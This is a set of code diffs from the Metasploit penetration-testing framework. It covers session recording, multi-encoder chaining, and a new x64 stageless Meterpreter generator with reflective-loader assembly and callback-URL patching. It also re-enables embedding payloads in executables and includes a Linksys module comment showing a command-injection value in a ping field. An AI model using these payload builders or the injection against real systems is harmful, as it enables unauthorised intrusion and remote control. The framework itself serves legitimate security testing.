@ -126,4 +126,4 @@ module Msf::DBManager::Service
wspace.services.includes(:host).where(conditions).order("hosts.address, port")
}
end
end
end

228
lib/msf/core/db_manager/session.rb
View File

@ -74,101 +74,66 @@ module Msf::DBManager::Session
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
# saved.
#
# @raise ArgumentError if :host and :session is +nil+
# @raise ArgumentError if :host and :session are both +nil+
def report_session(opts)
return if not active
::ActiveRecord::Base.connection_pool.with_connection {
if opts[:session]
raise ArgumentError.new("Invalid :session, expected Msf::Session") unless opts[:session].kind_of? Msf::Session
session = opts[:session]
wspace = opts[:workspace] || find_workspace(session.workspace)
h_opts = { }
h_opts[:host] = normalize_host(session)
h_opts[:arch] = session.arch if session.respond_to?(:arch) and session.arch
h_opts[:workspace] = wspace
host = find_or_create_host(h_opts)
sess_data = {
:host_id => host.id,
:stype => session.type,
:desc => session.info,
:platform => session.platform,
:via_payload => session.via_payload,
:via_exploit => session.via_exploit,
:routes => [],
:datastore => session.exploit_datastore.to_h,
:port => session.session_port,
:opened_at => Time.now.utc,
:last_seen => Time.now.utc,
:local_id => session.sid
}
s = create_mdm_session_from_session(opts)
session.db_record = s
elsif opts[:host]
raise ArgumentError.new("Invalid :host, expected Host object") unless opts[:host].kind_of? ::Mdm::Host
host = opts[:host]
sess_data = {
:host_id => host.id,
:stype => opts[:stype],
:desc => opts[:desc],
:platform => opts[:platform],
:via_payload => opts[:via_payload],
:via_exploit => opts[:via_exploit],
:routes => opts[:routes] || [],
:datastore => opts[:datastore],
:opened_at => opts[:opened_at],
:closed_at => opts[:closed_at],
:last_seen => opts[:last_seen] || opts[:closed_at],
:close_reason => opts[:close_reason],
}
s = create_mdm_session_from_host(opts)
else
raise ArgumentError.new("Missing option :session or :host")
end
ret = {}
# Truncate the session data if necessary
if sess_data[:desc]
sess_data[:desc] = sess_data[:desc][0,255]
end
wspace = s.workspace
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
s.save!
if session and session.exploit_task and session.exploit_task.record
session_task = session.exploit_task.record
if session_task.class == Mdm::Task
Mdm::TaskSession.create(:task => session_task, :session => s )
if session
if session.exploit.user_data_is_match?
MetasploitDataModels::AutomaticExploitation::MatchResult.create!(
match: session.exploit.user_data[:match],
match_set: session.exploit.user_data[:match_set],
run: session.exploit.user_data[:run],
state: 'succeeded',
)
elsif session.via_exploit
# This is a live session, we know the host is vulnerable to something.
infer_vuln_from_session(session, wspace)
end
end
s
}
end
if opts[:session]
session.db_record = s
end
protected
# If this is a live session, we know the host is vulnerable to something.
if opts[:session] and session.via_exploit
mod = framework.modules.create(session.via_exploit)
# @param session [Msf::Session] A session with a {db_record Msf::Session#db_record}
# @param wspace [Mdm::Workspace]
# @return [void]
def infer_vuln_from_session(session, wspace)
::ActiveRecord::Base.connection_pool.with_connection {
s = session.db_record
host = s.host
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::Module::Detail.find_by_fullname(mod_fullname).name
if session.via_exploit == "exploit/multi/handler" and session.exploit_datastore['ParentModule']
mod_fullname = session.exploit_datastore['ParentModule']
else
mod_name = mod.name
mod_fullname = mod.fullname
mod_fullname = session.via_exploit
end
mod_detail = ::Mdm::Module::Detail.find_by_fullname(mod_fullname)
mod_name = mod_detail.name
vuln_info = {
:host => host.address,
:name => mod_name,
:refs => mod.references,
:workspace => wspace,
:exploited_at => Time.now.utc,
:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
exploited_at: Time.now.utc,
host: host,
info: "Exploited by #{mod_fullname} to create Session #{s.id}",
name: mod_name,
refs: mod_detail.refs.map(&:name),
workspace: wspace,
}
port = session.exploit_datastore["RPORT"]
@ -178,28 +143,105 @@ module Msf::DBManager::Session
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit
end
attempt_info = {
:timestamp => Time.now.utc,
:workspace => wspace,
:module => via_exploit,
:username => session.username,
:refs => mod.references,
:session_id => s.id,
:host => host,
:service => service,
:vuln => vuln
host: host,
module: mod_fullname,
refs: mod_detail.refs,
service: service,
session_id: s.id,
timestamp: Time.now.utc,
username: session.username,
vuln: vuln,
workspace: wspace,
}
framework.db.report_exploit_success(attempt_info)
end
s
}
vuln
}
end
end
def create_mdm_session_from_session(opts)
::ActiveRecord::Base.connection_pool.with_connection {
session = opts[:session]
raise ArgumentError.new("Invalid :session, expected Msf::Session") unless session.kind_of? Msf::Session
wspace = opts[:workspace] || find_workspace(session.workspace)
h_opts = { }
h_opts[:host] = normalize_host(session)
h_opts[:arch] = session.arch if session.respond_to?(:arch) and session.arch
h_opts[:workspace] = wspace
host = find_or_create_host(h_opts)
sess_data = {
datastore: session.exploit_datastore.to_h,
desc: truncate_session_desc(session.info),
host_id: host.id,
last_seen: Time.now.utc,
local_id: session.sid,
opened_at: Time.now.utc,
platform: session.platform,
port: session.session_port,
routes: [],
stype: session.type,
via_exploit: session.via_exploit,
via_payload: session.via_payload,
}
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.create!(sess_data)
if session.exploit_task and session.exploit_task.record
session_task = session.exploit_task.record
if session_task.class == Mdm::Task
Mdm::TaskSession.create(task: session_task, session: s )
end
end
s
}
end
def create_mdm_session_from_host(opts)
::ActiveRecord::Base.connection_pool.with_connection {
host = opts[:host]
raise ArgumentError.new("Invalid :host, expected Host object") unless host.kind_of? ::Mdm::Host
sess_data = {
host_id: host.id,
stype: opts[:stype],
desc: truncate_session_desc(opts[:desc]),
platform: opts[:platform],
via_payload: opts[:via_payload],
via_exploit: opts[:via_exploit],
routes: opts[:routes] || [],
datastore: opts[:datastore],
opened_at: opts[:opened_at],
closed_at: opts[:closed_at],
last_seen: opts[:last_seen] || opts[:closed_at],
close_reason: opts[:close_reason],
}
s = ::Mdm::Session.create!(sess_data)
s
}
end
# Truncate the session data if necessary
#
# @param desc [String]
# @return [String] +desc+ truncated to the max length of the desc column
def truncate_session_desc(desc)
# Truncate the session data if necessary
if desc
desc = desc[0, ::Mdm::Session.columns_hash['desc'].limit]
end
desc
end
end

25
lib/msf/core/encoded_payload.rb
View File

@ -49,8 +49,6 @@ class EncodedPayload
self.nop_sled = nil
self.encoder = nil
self.nop = nil
self.iterations = reqs['Iterations'].to_i
self.iterations = 1 if self.iterations < 1
# Increase thread priority as necessary. This is done
# to ensure that the encoding and sled generation get
@ -71,8 +69,27 @@ class EncodedPayload
# Generate the raw version of the payload first
generate_raw() if self.raw.nil?
# Encode the payload
encode()
# If encoder is set, it could be an encoders list
# The form is "<encoder>:<iteration>, <encoder2>:<iteration>"...
if reqs['Encoder']
encoder_str = reqs['Encoder']
encoder_str.scan(/([^:, ]+):?([^,]+)?/).map do |encoder_opt|
reqs['Encoder'] = encoder_opt[0]
self.iterations = (encoder_opt[1] || reqs['Iterations']).to_i
self.iterations = 1 if self.iterations < 1
# Encode the payload with every encoders in the list
encode()
# Encoded payload is now the raw payload to be encoded by the next encoder
self.raw = self.encoded
end
else
self.iterations = reqs['Iterations'].to_i
self.iterations = 1 if self.iterations < 1
# No specified encoder, let BadChars or ForceEncode do their job
encode()
end
# Build the NOP sled
generate_sled()

2
lib/msf/core/exploit/http/server.rb
View File

@ -305,7 +305,7 @@ module Exploit::Remote::HttpServer
when /opera\/(\d+(:?\.\d+)*)/
fp[:ua_name] = HttpClients::OPERA
fp[:ua_ver] = $1
when /mozilla\/[0-9]+\.[0-9] \(compatible; msie ([0-9]+\.[0-9]+)/
when /mozilla\/[0-9]+\.[0-9] \(compatible; msie ([0-9]+\.[0-9]+)/i, /mozilla\/[0-9]+\.[0-9] \(.+ rv:([0-9]+\.[0-9])\)/i
fp[:ua_name] = HttpClients::IE
fp[:ua_ver] = $1
else

1
lib/msf/core/exploit/smb/client.rb
View File

@ -3,6 +3,7 @@ require 'rex/proto/smb'
require 'rex/proto/ntlm'
require 'rex/proto/dcerpc'
require 'rex/encoder/ndr'
require 'recog'
module Msf
module Exploit::Remote::SMB

6
lib/msf/core/exploit/smb/client/psexec.rb
View File

@ -35,7 +35,7 @@ module Exploit::Remote::SMB::Client::Psexec
# Retrieve the SERVICE_NAME option, generate a random
# one if not already set.
#
# @return service_name [String] the name of the service.
# @return [String] service_name the name of the service.
def service_name
@service_name ||= datastore['SERVICE_NAME']
@service_name ||= Rex::Text.rand_text_alpha(8)
@ -44,7 +44,7 @@ module Exploit::Remote::SMB::Client::Psexec
# Retrieve the SERVICE_DISPLAY_NAME option, generate a random
# one if not already set.
#
# @return service_display_name [String] the display name of the service.
# @return [String] the display name of the service.
def display_name
@display_name ||= datastore['SERVICE_DISPLAY_NAME']
@display_name ||= Rex::Text.rand_text_alpha(16)
@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Client::Psexec
# Retrieve the SERVICE_DESCRIPTION option
#
# @return service_description [String] the service description.
# @return [String] the service description.
def service_description
@service_description ||= datastore['SERVICE_DESCRIPTION']
end

4
lib/msf/core/handler/reverse_http.rb
View File

@ -1,8 +1,8 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'msf/core/handler/reverse_http/uri_checksum'
require 'rex/payloads/meterpreter/patch'
require 'rex/payloads/meterpreter/uri_checksum'
require 'rex/parser/x509_certificate'
require 'msf/core/payload/windows/verify_ssl'
@ -17,7 +17,7 @@ module Handler
module ReverseHttp
include Msf::Handler
include Msf::Handler::ReverseHttp::UriChecksum
include Rex::Payloads::Meterpreter::UriChecksum
include Msf::Payload::Windows::VerifySsl
#

73
lib/msf/core/handler/reverse_http/stageless.rb Normal file
View File

@ -0,0 +1,73 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/parser/x509_certificate'
require 'msf/core/payload/uuid_options'
module Msf
##
#
# Helper functionality for handling of stageless http(s) payloads
#
##
module Handler::ReverseHttp::Stageless
include Msf::Payload::Windows::VerifySsl
include Msf::Payload::UUIDOptions
def initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
], self.class)
end
def generate_stageless(&block)
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}" + generate_uri_uuid_mode(:connect)
unless block_given?
raise ArgumentError, "Stageless generation requires a block argument"
end
# invoke the given function to generate the architecture specific payload
block.call(url) do |dll|
# TODO: figure out this bit
# patch the target ID into the URI if specified
#if opts[:target_id]
# i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
# if i
# t = opts[:target_id].to_s
# raise "Target ID must be less than 5 bytes" if t.length > 4
# u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
# print_status("Patching Target ID #{t} into DLL")
# dll[i, u.length] = u
# end
#end
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
:url => url,
:ssl => true,
:ssl_cert_hash => verify_cert_hash,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:ua => datastore['MeterpreterUserAgent'],
:proxy_host => datastore['PayloadProxyHost'],
:proxy_port => datastore['PayloadProxyPort'],
:proxy_type => datastore['PayloadProxyType'],
:proxy_user => datastore['PayloadProxyUser'],
:proxy_pass => datastore['PayloadProxyPass'])
end
end
end
end

22
lib/msf/core/module.rb
View File

@ -57,6 +57,10 @@ class Module
# datastore, consumed by #replicant to allow clean override of MSF module methods.
REPLICANT_EXTENSION_DS_KEY = 'ReplicantExtensions'
# The set of keys in {#user_data} that make {#user_data_is_match?} return
# true
MATCH_KEYS = Set.new([ :match, :match_set, :run ])
# Make include public so we can runtime extend
public_class_method :include
@ -278,6 +282,14 @@ class Module
raise RuntimeError, "#{reason.to_s}: #{msg}"
end
# Whether {#user_data} contains everything necessary to make a
# `MetasploitDataModels::AutomaticExploitation::MatchResult`
#
# @return [bool]
def user_data_is_match?
user_data.kind_of?(Hash) && Set.new(user_data.keys).superset?(MATCH_KEYS)
end
##
#
# Just some handy quick checks
@ -295,6 +307,7 @@ class Module
# The array of zero or more platforms.
#
attr_reader :platform
#
# The reference count for the module.
#
@ -315,6 +328,15 @@ class Module
#
attr_accessor :error
# An opaque bag of data to attach to a module. This is useful for attaching
# some piece of identifying info on to a module before calling
# {Msf::Simple::Exploit#exploit_simple} or
# {Msf::Simple::Auxiliary#run_simple} for correlating where modules came
# from.
#
# @see #user_data_is_match?
attr_accessor :user_data
protected
#

47
lib/msf/core/payload/stager.rb
View File

@ -17,7 +17,7 @@ module Msf::Payload::Stager
Msf::OptBool.new("EnableStageEncoding", [ false, "Encode the second stage payload", false ]),
Msf::OptString.new("StageEncoder", [ false, "Encoder to use if EnableStageEncoding is set", nil ]),
Msf::OptString.new("StageEncoderSaveRegisters", [ false, "Additional registers to preserve in the staged payload if EnableStageEncoding is set", "" ]),
Msf::OptBool.new("StageEncodingFallback", [ false, "Fallback to default encoders or no encoding if the selected StageEncoder is not compatible", true ])
Msf::OptBool.new("StageEncodingFallback", [ false, "Fallback to no encoding if the selected StageEncoder is not compatible", true ])
], Msf::Payload::Stager)
end
@ -221,22 +221,11 @@ module Msf::Payload::Stager
# @return [String] Encoded version of +stg+
def encode_stage(stg)
return stg unless encode_stage?
stage_enc_mod = []
stage_enc_mod = nil
# Handle StageEncoder if specified by the user
if datastore['StageEncoder'].to_s.length > 0
# Allow multiple encoders separated by commas
stage_enc_mod = datastore["StageEncoder"].split(',').map(&:strip).select{|x| x.to_s.length > 0}.uniq
end
# Add automatic encoding as a fallback if needed
if datastore['StageEncodingFallback']
stage_enc_mod << nil
end
# If fallback has been disabled and no encoder was parsed, exit early and rop the session
if stage_enc_mod.length == 0
raise RuntimeError, "StageEncoder is invalid and StageEncodingFallback is disabled"
stage_enc_mod = datastore["StageEncoder"]
end
# Allow the user to specify additional registers to preserve
@ -247,34 +236,32 @@ module Msf::Payload::Stager
saved_registers.strip!
estg = nil
stage_enc_mod.each do |encoder_refname_from_user|
begin
# Generate an encoded version of the stage. We tell the encoding system
# to save certain registers to ensure that it does not get clobbered.
encp = Msf::EncodedPayload.create(
self,
'Raw' => stg,
'Encoder' => encoder_refname_from_user,
'Encoder' => stage_enc_mod,
'EncoderOptions' => { 'SaveRegisters' => saved_registers },
'ForceSaveRegisters' => true,
'ForceEncode' => true)
if encp.encoder
print_status("Encoded stage with #{encp.encoder.refname}")
if stage_enc_mod
print_status("Encoded stage with #{stage_enc_mod}")
else
print_status("Encoded stage with #{encp.encoder.refname}")
end
estg = encp.encoded
break
end
end
if datastore['StageEncodingFallback'] && estg.nil?
print_warning("StageEncoder failed, falling back to no encoding")
estg = stg
end
unless estg
raise RuntimeError, "Stage encoding failed and StageEncodingFallback is disabled"
rescue
if datastore['StageEncodingFallback'] && estg.nil?
print_warning("StageEncoder failed, falling back to no encoding")
estg = stg
else
raise RuntimeError, "Stage encoding failed and StageEncodingFallback is disabled"
end
end
estg

41
lib/msf/core/payload/uuid.rb
View File

@ -20,25 +20,26 @@ class Msf::Payload::UUID
0 => nil,
1 => ARCH_X86,
2 => ARCH_X86_64,
3 => ARCH_MIPS,
4 => ARCH_MIPSLE,
5 => ARCH_MIPSBE,
6 => ARCH_PPC,
7 => ARCH_PPC64,
8 => ARCH_CBEA,
9 => ARCH_CBEA64,
10 => ARCH_SPARC,
11 => ARCH_ARMLE,
12 => ARCH_ARMBE,
13 => ARCH_CMD,
14 => ARCH_PHP,
15 => ARCH_TTY,
16 => ARCH_JAVA,
17 => ARCH_RUBY,
18 => ARCH_DALVIK,
19 => ARCH_PYTHON,
20 => ARCH_NODEJS,
21 => ARCH_FIREFOX
3 => ARCH_X64, # Should be merged into X86_64 sometime
4 => ARCH_MIPS,
5 => ARCH_MIPSLE,
6 => ARCH_MIPSBE,
7 => ARCH_PPC,
8 => ARCH_PPC64,
9 => ARCH_CBEA,
10 => ARCH_CBEA64,
11 => ARCH_SPARC,
12 => ARCH_ARMLE,
13 => ARCH_ARMBE,
14 => ARCH_CMD,
15 => ARCH_PHP,
16 => ARCH_TTY,
17 => ARCH_JAVA,
18 => ARCH_RUBY,
19 => ARCH_DALVIK,
20 => ARCH_PYTHON,
21 => ARCH_NODEJS,
22 => ARCH_FIREFOX
}
Platforms = {
@ -104,8 +105,6 @@ class Msf::Payload::UUID
puid = seed_to_puid(opts[:seed])
end
p opts
puid ||= Rex::Text.rand_text(8)
if puid.length != 8

4
lib/msf/core/payload/uuid_options.rb
View File

@ -2,14 +2,14 @@
require 'msf/core'
require 'msf/core/payload/uuid'
require 'msf/core/handler/reverse_http/uri_checksum'
require 'rex/payloads/meterpreter/uri_checksum.rb'
#
# This module provides datastore option definitions and helper methods for payload modules that support UUIDs
#
module Msf::Payload::UUIDOptions
include Msf::Handler::ReverseHttp::UriChecksum
include Rex::Payloads::Meterpreter::UriChecksum
def initialize(info = {})
super

2
lib/msf/core/payload/windows/stageless_meterpreter.rb
View File

@ -51,7 +51,7 @@ module Payload::Windows::StagelessMeterpreter
asm
end
def generate_stageless_meterpreter(url = nil)
def generate_stageless_x86(url = nil)
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll'))
conf = {

111
lib/msf/core/payload/windows/x64/stageless_meterpreter.rb Normal file
View File

@ -0,0 +1,111 @@
#-*- coding: binary -*-
require 'msf/core'
require 'rex/payloads/meterpreter/patch'
module Msf
##
#
# Implements stageless invocation of metsrv in x64
#
##
module Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::ReflectiveDLLLoader
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
mov r8, rbx ; r8 points to the extension list
mov rbx, rax ; save DllMain for another call
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; push 5, indicate that we have detached
pop rdx ; pop 5 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
asm
end
def generate_stageless_x64(url = nil)
dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x64.dll'))
conf = {
:rdi_offset => offset,
:length => dll.length,
:exitfunk => datastore['EXITFUNC']
}
asm = asm_invoke_metsrv(conf)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
print_error("Stageless Meterpreter generated with oversized x64 bootstrap.")
return
end
# patch the binary with all the stuff
dll[0, bootstrap.length] = bootstrap
# the URL might not be given, as it might be patched in some other way
if url
# Patch the URL using the patcher as this supports both ASCII and WCHAR.
unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
end
end
# if a block is given then call that with the meterpreter dll
# so that custom patching can happen if required
yield dll if block_given?
# append each extension to the payload, including
# the size of the extension
unless datastore['EXTENSIONS'].nil?
datastore['EXTENSIONS'].split(',').each do |e|
e = e.strip.downcase
ext, o = load_rdi_dll(MeterpreterBinaries.path("ext_server_#{e}", 'x64.dll'))
# append the size, offset to RDI and the payload itself
dll << [ext.length].pack('V') + ext
end
end
# Terminate the "list" of extensions
dll + [0].pack('V')
end
end
end

4
lib/msf/core/post/windows/mssql.rb
View File

@ -54,9 +54,9 @@ module Msf
end
# Identifies a valid SQL Server command line client on the host and sets
# @sql_client
# sql_client
#
# @see #sql_client
# @see sql_client
# @return [String, nil] the SQL command line client
def get_sql_client
client = nil

2
lib/msf/core/post/windows/services.rb
View File

@ -528,7 +528,7 @@ module Services
# Parses out a SERVICE_STATUS struct from the
# lpServiceStatus out parameter
#
# @param (lpServiceStatus)
# @param lpServiceStatus [String] the latest status of calling service
#
# @return [Hash] Containing SERVICE_STATUS values
#

2
lib/msf/http/jboss/base.rb
View File

@ -49,7 +49,7 @@ module Msf::HTTP::JBoss::Base
# Try to auto detect the target architecture and platform
#
# @param [Array] The available targets
# @param [Array] available_targets The available targets
# @return [Msf::Module::Target, nil] The detected target or nil
def auto_target(available_targets)
if http_verb == 'HEAD'

2
lib/msf/http/jboss/deployment_file_repository_scripts.rb
View File

@ -7,7 +7,7 @@ module Msf::HTTP::JBoss::DeploymentFileRepositoryScripts
# to overcome the size limit in those requests
#
# @param stager_base [String] The name of the base of the stager.
# @param stager_jsp [String] The name name of the jsp stager.
# @param stager_jsp_name [String] The name name of the jsp stager.
# @return [String] The JSP head stager.
def head_stager_jsp(stager_base, stager_jsp_name)
content_var = Rex::Text.rand_text_alpha(8+rand(8))

1
lib/msf/java/rmi/client.rb
View File

@ -111,7 +111,6 @@ module Msf
#
# @param opts [Hash]
# @option opts [Rex::Socket::Tcp] :sock
# @return [String]
def safe_get_once(nsock = sock)
data = ''
begin

2
lib/msf/kerberos/client/cache_credential.rb
View File

@ -33,7 +33,7 @@ module Msf
# Builds a MIT Credential Cache principal
#
# @param opts [Hash<{Symbol => <Fixnum, String, Array<String>}>]
# @param opts [Hash<{Symbol => <Fixnum, String, Array<String>>}>]
# @option opts [Fixnum] :name_type
# @option opts [String] :realm
# @option opts [Array<String>] :components

4
lib/msf/ui/banner.rb
View File

@ -28,7 +28,7 @@ module Banner
fdata = "<< Missing banner: #{pathname} >>"
begin
raise ArgumentError unless File.readable?(pathname)
raise ArgumentError unless File.stat(pathname).size < 4096
raise ArgumentError unless File.stat(pathname).size < 16384
fdata = File.open(pathname) {|f| f.read f.stat.size}
rescue SystemCallError, ArgumentError
nil
@ -47,6 +47,8 @@ module Banner
# Easter egg (always a halloween themed logo): export/set THISISHALLOWEEN=1
elsif ( ENV['THISISHALLOWEEN'] || Time.now.strftime("%m%d") == "1031" )
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.hwtxt'))
elsif ( ENV['APRILFOOLSPONIES'] || Time.now.strftime("%m%d") == "0401" )
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.aftxt'))
else
logos.concat(Dir.glob(::Msf::Config.logos_directory + File::SEPARATOR + '*.txt'))
logos.concat(Dir.glob(::Msf::Config.user_logos_directory + File::SEPARATOR + '*.txt'))

13
lib/msf/ui/console/driver.rb
View File

@ -387,8 +387,13 @@ class Driver < Msf::Ui::Driver
if (conf.group?(ConfigGroup))
conf[ConfigGroup].each_pair { |k, v|
case k.downcase
when "activemodule"
when 'activemodule'
run_single("use #{v}")
when 'activeworkspace'
if framework.db.active
workspace = framework.db.find_workspace(v)
framework.db.workspace = workspace if workspace
end
end
}
end
@ -405,6 +410,12 @@ class Driver < Msf::Ui::Driver
group['ActiveModule'] = active_module.fullname
end
if framework.db.active
unless framework.db.workspace.default?
group['ActiveWorkspace'] = framework.db.workspace.name
end
end
# Save it
begin
Msf::Config.save(ConfigGroup => group)

26
lib/msf/util/exe.rb
View File

@ -183,12 +183,8 @@ require 'msf/core/exe/segment_appender'
payload = win32_rwx_exec(code)
# Create a new PE object and run through sanity checks
fsize = File.size(opts[:template])
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
text = nil
pe.sections.each {|sec| text = sec if sec.name == ".text"}
#try to inject code into executable by adding a section without affecting executable behavior
if opts[:inject]
injector = Msf::Exe::SegmentInjector.new({
@ -199,6 +195,9 @@ require 'msf/core/exe/segment_appender'
return injector.generate_pe
end
text = nil
pe.sections.each {|sec| text = sec if sec.name == ".text"}
raise RuntimeError, "No .text section found in the template" unless text
unless text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
@ -521,19 +520,16 @@ require 'msf/core/exe/segment_appender'
return injector.generate_pe
end
opts[:exe_type] = :exe_sub
return exe_sub_method(code,opts)
#opts[:exe_type] = :exe_sub
#return exe_sub_method(code,opts)
#
# TODO: 64-bit support is currently failing to stage
#
# Append a new section instead
# appender = Msf::Exe::SegmentAppender.new({
# :payload => code,
# :template => opts[:template],
# :arch => :x64
# })
# return appender.generate_pe
appender = Msf::Exe::SegmentAppender.new({
:payload => code,
:template => opts[:template],
:arch => :x64
})
return appender.generate_pe
end
# Embeds shellcode within a Windows PE file implementing the Windows

20
lib/rex/payloads/meterpreter/patch.rb
View File

@ -63,7 +63,7 @@ module Rex
if proxyport == "80"
proxyinfo = proxyhost
end
if proxy_type.to_s == 'HTTP'
if proxy_type.to_s.upcase == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
@ -76,17 +76,21 @@ module Rex
# Proxy authentification
def self.patch_proxy_auth!(blob, proxy_username, proxy_password, proxy_type)
unless (proxy_username.nil? or proxy_username.empty?) or
(proxy_password.nil? or proxy_password.empty?) or
proxy_type == 'SOCKS'
return if proxy_type.nil? || proxy_type.upcase == 'SOCKS'
patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
if proxy_username && !proxy_username.empty?
unless patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
proxy_username + "\x00")
patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Username"
end
end
if proxy_password && !proxy_password.empty?
unless patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Password"
end
end
end
# Patch the ssl cert hash

7
lib/msf/core/handler/reverse_http/uri_checksum.rb → lib/rex/payloads/meterpreter/uri_checksum.rb
View File

@ -1,10 +1,9 @@
# -*- coding: binary -*-
require 'msf/core/payload/uuid'
module Msf
module Handler
module ReverseHttp
module Rex
module Payloads
module Meterpreter
module UriChecksum
#

2
lib/rex/proto/kerberos/client.rb
View File

@ -187,7 +187,7 @@ module Rex
# Decodes a Kerberos response
#
# @param input [String] the raw response message
# @param data [String] the raw response message
# @return [<Rex::Proto::Kerberos::Model::KrbError, Rex::Proto::Kerberos::Model::KdcResponse>] the kerberos message response
# @raise [RuntimeError] if the response can't be processed
def decode_kerb_response(data)

2
metasploit-framework-db.gemspec
View File

@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
# Metasploit::Credential database models
spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.3'
# Database models shared between framework and Pro.
spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.0'
spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.2'
# depend on metasploit-framewrok as the optional gems are useless with the actual code
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
# Needed for module caching in Mdm::ModuleDetails

6
modules/auxiliary/admin/2wire/xslt_password_reset.rb
View File

@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#check to see if we get HTTP OK
# check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
else
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Check to verify server reported is a 2wire router
# Check to verify server reported is a 2wire router
if (res.headers['Server'].match(/2wire Gateway/i))
print_status("Server is a 2wire Gateway! Grabbing info\n")
else
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Hardware Version: #{hardware}")
end
#Check the Software Version
# Check the Software Version
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
ver = $1
print_status("Software version: #{ver}")

6
modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
View File

@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
cmd = datastore['CMD']
#original post request:
#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
# original post request:
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
